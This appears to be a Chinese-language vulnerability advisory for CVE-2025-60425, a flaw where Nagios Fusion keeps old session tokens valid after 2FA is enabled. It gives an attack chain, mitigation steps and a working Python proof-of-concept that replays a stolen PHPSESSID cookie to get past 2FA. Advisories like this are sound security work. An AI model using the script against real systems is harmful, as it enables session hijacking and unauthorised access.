CVE-2025-60425 Nagios Fusion 2FA启用后会话令牌未失效导致会话劫持

漏洞信息

漏洞编号

CVE-2025-60425

漏洞类型

会话劫持

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Nagios Fusion

漏洞概述

Nagios Fusion是一款企业级网络和系统监控平台，用于集中管理和监控分布式IT基础设施。该漏洞存在于Nagios Fusion v2024R1.2和v2024R2版本中，当管理员启用双因素认证（2FA）功能时，系统存在严重的安全缺陷。具体而言，当用户已经登录并拥有有效的会话令牌后，管理员启用2FA机制，此时系统并未使已有的会话令牌失效。这意味着攻击者如果通过某种方式获取了用户在2FA启用前的有效会话令牌，可以在2FA启用后继续使用该令牌进行身份认证，从而绕过双因素认证的保护机制。这种漏洞允许未经授权的攻击者执行会话劫持攻击，冒充合法用户访问Nagios Fusion系统，执行监控配置修改、查看敏感告警信息等操作，对企业网络安全造成严重威胁。

技术细节

该漏洞的根本原因在于Nagios Fusion在启用双因素认证时缺乏正确的会话管理机制。正常的安全实践要求，当安全策略发生变更（如启用2FA）时，系统应当使所有现有会话失效，强制用户重新进行身份认证并完成2FA验证流程。然而，Nagios Fusion v2024R1.2和v2024R2版本在这一点上存在设计缺陷。攻击者首先需要获取目标用户的有效会话令牌，这可以通过多种方式实现，包括但不限于：网络嗅探、XSS攻击、客户端恶意软件或社会工程学手段。获取会话令牌后，攻击者可以在2FA启用后的任何时间点使用该令牌直接访问系统，无需进行双因素验证。系统会认为这是一个已通过认证的合法会话，从而授予攻击者完整的用户权限。攻击者可以利用此漏洞进行横向移动，访问敏感监控数据，修改监控配置，甚至将恶意监控目标添加到系统中。

攻击链分析

STEP 1

步骤1

攻击者通过XSS、网络嗅探或社会工程学等手段获取用户在2FA启用前的有效会话令牌（PHPSESSID）

STEP 2

步骤2

Nagios Fusion管理员在管理界面启用双因素认证（2FA）功能以增强账户安全

STEP 3

步骤3

系统启用2FA后，未使已有的会话令牌失效，攻击者获取的旧令牌仍然有效

STEP 4

步骤4

攻击者使用窃取的会话令牌发送HTTP请求，绕过2FA验证直接访问受保护的Nagios Fusion系统

STEP 5

步骤5

攻击者成功以合法用户身份登录系统，可执行查看监控数据、修改配置、添加恶意监控目标等操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-60425 PoC - Nagios Fusion Session Hijacking After 2FA Enable

Description: Nagios Fusion does not invalidate existing session tokens when
2FA is enabled, allowing attackers to perform session hijacking attacks.

Usage: python3 cve-2025-60425_poc.py <target_url> <stolen_session_token>
"""

import sys
import requests

def exploit_session_hijacking(target_url, session_token):
    """
    Attempt to use a stolen session token after 2FA has been enabled.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': f'PHPSESSID={session_token}'
    }
    
    # Try to access protected endpoint
    endpoints = [
        '/nagiosfusion/',
        '/nagiosfusion/index.php',
        '/nagiosfusion/main.php',
        '/nagiosfusion/views/dashboard.php'
    ]
    
    print(f'[*] Target: {target_url}')
    print(f'[*] Session Token: {session_token}')
    print('[*] Attempting session hijacking...\n')
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            print(f'[?] Endpoint: {endpoint}')
            print(f'    Status: {response.status_code}')
            
            # Check if session is still valid
            if 'Fusion' in response.text and 'login' not in response.url.lower():
                print(f'    [+] SUCCESS: Session token is still valid!')
                print(f'    [+] Attack possible: Session hijacking successful')
                return True
            else:
                print(f'    [-] Session invalid or requires re-authentication')
        except requests.RequestException as e:
            print(f'[!] Error accessing {endpoint}: {e}')
    
    return False

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f'Usage: python3 {sys.argv[0]} <target_url> <session_token>')
        sys.exit(1)
    
    exploit_session_hijacking(sys.argv[1], sys.argv[2])

影响范围

Nagios Fusion v2024R1.2

Nagios Fusion v2024R2

防御指南

临时缓解措施

在等待官方修复期间，建议采取以下临时缓解措施：1) 启用2FA后立即通知所有用户重新登录；2) 手动清除所有现有PHP会话文件；3) 实施严格的IP绑定会话验证；4) 加强对管理界面的访问控制，限制可访问IP范围；5) 启用详细的审计日志以监控可疑会话活动；6) 考虑暂时禁用管理界面的远程访问，改为通过VPN访问。